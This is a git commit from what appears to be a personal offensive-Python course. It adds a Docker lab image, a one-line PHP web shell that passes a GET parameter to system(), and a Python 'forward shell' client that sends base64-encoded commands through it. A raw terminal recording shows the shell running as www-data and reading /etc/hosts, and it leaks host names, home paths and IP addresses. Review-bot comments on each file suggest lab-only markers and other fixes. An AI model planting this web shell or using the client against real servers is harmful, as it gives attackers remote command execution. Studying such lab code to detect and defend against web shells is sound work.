Manuel Vergara 2024-02-02 23:02:37 +01:00
parent 0d95645a93
commit 5d7e3302c5
4 changed files with 230 additions and 0 deletions


@ -0,0 +1,5 @@
FROM php:7.0-apache
COPY index.php /var/www/html/
EXPOSE 80
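Review bot: `FROM php:7.0-apache` selects a PHP branch that is long out of security support, and nothing in the file says the image exists only to serve the deliberately vulnerable `index.php` copied on the next line. `EXPOSE 80` does not publish the port by itself, so the exposure depends entirely on how the container is started. Add a header comment that records the intent and the safe way to run it, for example `# Deliberately vulnerable lab image: publish only on loopback (docker run -p 127.0.0.1:80:80 ...)`.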


@ -0,0 +1,5 @@
<?php
system($_GET['cmd']);
?>
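Review bot: `system($_GET['cmd']);` hands a request parameter straight to the shell with no authentication or allow-list, so anyone who can reach the container's port 80 runs commands as the web server user (the session recorded in this commit shows `www-data`). That is presumably the point of the lab, but the file carries no marker saying so. Add a header comment such as `// LAB ONLY: intentionally vulnerable command-execution page, never deploy outside the local container`. For the defensive side of the exercise, note that each request leaves its `cmd=` query string in the Apache access log, which is where this activity would be detected.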


@ -0,0 +1,51 @@
#!/usr/bin/env python3
"""
Forward Shell
Comandos para reverse shell:
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
mkfifo input; tail -f input | /bin/sh 2>&1 > output
"""
import requests
import signal
import sys
from termcolor import colored
from base64 import b64encode
def def_handler(sig, frame):
print(colored("\n[!] Exiting...", "blue"))
sys.exit(1)
signal.signal(signal.SIGINT, def_handler)
main_url = "http://localhost/index.php"
def run_command(command):
command = b64encode(command.encode()).decode()
data = {
'cmd': 'echo "%s" | base64 -d | /bin/sh' % command
}
r = requests.get(main_url, params=data)
return r.text
if __name__ == '__main__':
while True:
command = input(colored("> ", "yellow"))
output_command = run_command(command)
print(output_command)
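Review bot: `requests.get(main_url, params=data)` in `run_command` has no timeout, so a command that waits on stdin blocks the client until Ctrl-C. The session log added in this same commit shows exactly that after `cat`, ending in a `KeyboardInterrupt` traceback inside `recv_into`. Pass an explicit bound, `r = requests.get(main_url, params=data, timeout=10)`, and handle `requests.exceptions.Timeout` with a short message instead of letting it propagate. The module docstring also describes a `mkfifo` setup that the code never uses; a one-line English summary saying the script talks to the local lab container at `main_url` would match what the code does.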


@ -0,0 +1,169 @@
Script started on 2024-02-02 18:20:04+01:00 [TERM="xterm-256color" TTY="/dev/pts/1" COLUMNS="106" LINES="53"]
 
7🐧 ~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs at ⚡ 18:20:04
 [?2004h[?25l8]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs]1;..hacking/12_fs]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs\%  
🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs on ☕ main ?1  🔒 ES at ⚡ 18:20:04
 [?1h=[?25h[?2004h[?25l 
🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:04
 🏠 192.168.1.115[?25h[?25l 
🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:04
 🏠 192.168.1.115 📡 192.145.39.55[?25hscriptscript/[?1l>[?25l[?2004l  script/[?25h
]2;script/]1;script/% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:09
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004h##!#!//uussrr//bbiinn//eennvv  ppyytthhoonn3[?1l>[?25l[?2004l  #!/usr/bin/env python3[?25h
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:30
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hccurl -s -X GET 'http://localhost/' -G --data-urlencode 'cmd=cat /etc/resolv.conf 2>&1'co🏠 192.168.1.115 📡 192.145.39.55de index.htmlcoddd           d e index.htmlcode f         irmaMail-Prefapp.htmlo                    rwat rdshell.py[?1l>[?25l[?2004l  code forwardshell.py[?25h
]2;code forwardshell.py]1;code% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:44
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hppyinstaller --noconsole --onefile backdoor.pypy                                           listener.pyf          irefox_decrypt.pyfo                orrwardshell.py  [?1l>[?25l[?2004l  py forwardshell.py[?25h
]2;python3 forwardshell.py]1;pywww-data
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:23:42
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l  py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> cat
/
^CTraceback (most recent call last):
File "/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/forwardshell.py", line 23, in <module>
output_command = run_command(command)
File "/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/forwardshell.py", line 14, in run_command
r = requests.get(main_url, params=data)
File "/home/v/.local/lib/python3.10/site-packages/requests/api.py", line 73, in get
return request("get", url, params=params, **kwargs)
File "/home/v/.local/lib/python3.10/site-packages/requests/api.py", line 59, in request
return session.request(method=method, url=url, **kwargs)
File "/home/v/.local/lib/python3.10/site-packages/requests/sessions.py", line 587, in request
resp = self.send(prep, **send_kwargs)
File "/home/v/.local/lib/python3.10/site-packages/requests/sessions.py", line 701, in send
r = adapter.send(request, **kwargs)
File "/home/v/.local/lib/python3.10/site-packages/requests/adapters.py", line 489, in send
resp = conn.urlopen(
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 700, in urlopen
httplib_response = self._make_request(
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 446, in _make_request
six.raise_from(e, None)
File "<string>", line 3, in raise_from
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 441, in _make_request
httplib_response = conn.getresponse()
File "/usr/lib/python3.10/http/client.py", line 1375, in getresponse
response.begin()
File "/usr/lib/python3.10/http/client.py", line 318, in begin
version, status, reason = self._read_status()
File "/usr/lib/python3.10/http/client.py", line 279, in _read_status
line = str(self.fp.readline(_MAXLINE + 1), "iso-8859-1")
File "/usr/lib/python3.10/socket.py", line 705, in readinto
return self._sock.recv_into(b)
KeyboardInterrupt
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/gi/p/curso-python/python-o/15/12/script on ☕ main ?1
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l  py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> whoami
www-data
> cat /etc/hosts
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
172.17.0.2 2f2f81768a05
> pwd
/var/www/html
> ^C
[!] Exiting...
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 7m 18s 🔒 ES vpn at ⚡ 18:34:09
 🏠 192.168.1.112 📡 192.145.39.55[?1h=[?2004h[?25l 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 7m 18s 🔒 ES vpn at ⚡ 18:34:09
 🏠 192.168.1.112 📡 192.145.39.54[?25hpy forwardshell.py[?1l>[?25l[?2004l  py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> exit
> exit
> ^C
[!] Exiting...
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 6s 🔒 ES vpn at ⚡ 18:35:25
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l  py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> exit
> exit
> ^C
[!] Exiting...
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 10s 🔒 ES vpn at ⚡ 18:36:02
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l  py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> exit
> ls
index.php
> e ^C
[!] Exiting...
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 10s 🔒 ES vpn at ⚡ 18:36:36
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hppy forwardshell.pyph                php --interactive[?1l>[?25l[?2004l  php --interactive[?25h
]2;php --interactive]1;phpzsh: command not found: php
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:36:56
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hdd exec -it 2f2 bashdo                 cker portdocckkedocker e   xec -it 0fc1 shxec -it 0fc1 sh[?1l>[?25l[?2004l  docker exec -it 0fc1 sh[?25h
]2;docker exec -it 0fc1 sh]1;dockerError response from daemon: No such container: 0fc1
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:37:09
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hddocker exec -it 0fc1 shd                      exec -it 2f2 bashexec -it 2f2 bash[?1l>[?25l[?2004l  d exec -it 2f2 bash[?25h
]2;docker exec -it 2f2 bash]1;droot@2f2f81768a05:/var/www/html# php --version
PHP 7.0.33 (cli) (built: Dec 29 2018 06:50:58) ( NTS )
Copyright (c) 1997-2017 The PHP Group
Zend Engine v3.0.0, Copyright (c) 1998-2017 Zend Technologies
root@2f2f81768a05:/var/www/html# php --interactive
Interactive shell
php > exit
root@2f2f81768a05:/var/www/html# e exit
exit
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 1m 55s 🔒 ES vpn at ⚡ 18:39:09
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hmmkdir scriptmkmkddimkdir c     atch-all/01_scripts_descifrador_wargame.pyi                                         bnc    atch-all/01_scripts_descifrador_wargame.pyo                                         mandos-peladon            cepto[?1l>[?25l[?2004l  mkdir concepto[?25h
]2;mkdir concepto]1;mkdir% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:39:33
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hllsls[?1l>[?25l[?2004l  ls[?25h
]2;ls --color=tty]1;lsconcepto forwardshell.py
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:39:33
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hccode forwardshell.pycocon                 catenadas="hola $kease"ncce                     epconcepto/o [?1l>[?25l[?2004l  concepto[?25h
]2;concepto]1;concepto% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto]1;..ript/concepto]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto\ 
🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto on ☕ main ?1  🔒 ES vpn at ⚡ 18:39:36
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hmmkdir conceptomkmkf           ifo --helpfiifmkfifo i     npyt;    ut;t  ttaaitail -f inop  put | //bbi/binn//bin/s/bin/sh 22>>&1 Z > ouputtput[?1l>[?25l[?2004l  mkfifo input; tail -f input | /bin/sh 2>&1 > output[?25h
]2;mkfifo input; tail -f input | /bin/sh 2>&1 > output]1;mkfifo^C
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto]1;..ript/concepto]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto\ 
🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto on ☕ main ?1 х INT took 7m 34s 🔒 ES vpn at ⚡ 18:48:03
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hcconceptoca      t ../09_keylogger/.env | pbcopycat o                            utput.pcap | wc -louutput              [?1l>[?25l[?2004l  cat output[?25h
]2;cat output]1;catv
/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto
/home/v
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto]1;..ript/concepto]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto\ 
🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto on ☕ main ?1  🔒 ES vpn at ⚡ 18:48:11
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hcat outputls       cat outputecho "whoami" > inputcat output         ls       cat outputecho "pwd" > inputcat output       ls       cat outputecho "whoami" > inputcat output         ls       cat outputls       cat output         mmkfifo input; tail -f input | /bin/sh 2>&1 > outputmkmkd                                                ir conceptomk            fifo input; tail -f input | /bin/sh 2>&1 > outputmkfmkfifo input; tail -f input | /bin/sh 2>&1 > output[?1l>[?25l[?2004l  mkfifo input; tail -f input | /bin/sh 2>&1 > output[?25h
]2;mkfifo input; tail -f input | /bin/sh 2>&1 > output]1;mkfifomkfifo: no sha pogut crear la cua FIFO 'input': El fitxer ja existeix
/bin/sh: 5: probando: not found
^C
Session terminated, killing shell...
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto]1;..ript/concepto]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto\ 
🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto on ☕ main ?1 х INT took 4m 51s 🔒 ES vpn at ⚡ 18:53:13
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004h ...killed.
[?25l  [?25h[?2004l
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto]1;..ript/concepto]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto\ 
🐧 ❌ ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto х INT 🔒 ES vpn at ⚡ 22:59:38
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004h 
🐧 ❌ ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto х INT 🔒 ES vpn at ⚡ 22:59:38
 🏠 192.168.1.112 📡 192.145.39.54eecho "whoami" > inputex                   itexiexit[?1l>[?25l[?2004l  exit[?25h
]2;exit]1;exit
Script done on 2024-02-02 23:00:00+01:00 [COMMAND_EXIT_CODE="130"]
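Review bot: This file is a raw `script(1)` recording, and it commits far more than the demo. The prompt lines carry the workstation's user and host name, full home-directory paths, LAN addresses and a public address, and the shell's autosuggestions expose unrelated history (for example a `cat ../09_keylogger/.env | pbcopy` suggestion). Replace it with a short hand-written transcript of the few commands that matter, or at least strip the escape sequences and prompt decoration (for instance with `col -b`) and redact the addresses before committing. If any of these values are sensitive, deleting the file in a later commit will not remove it from the repository history.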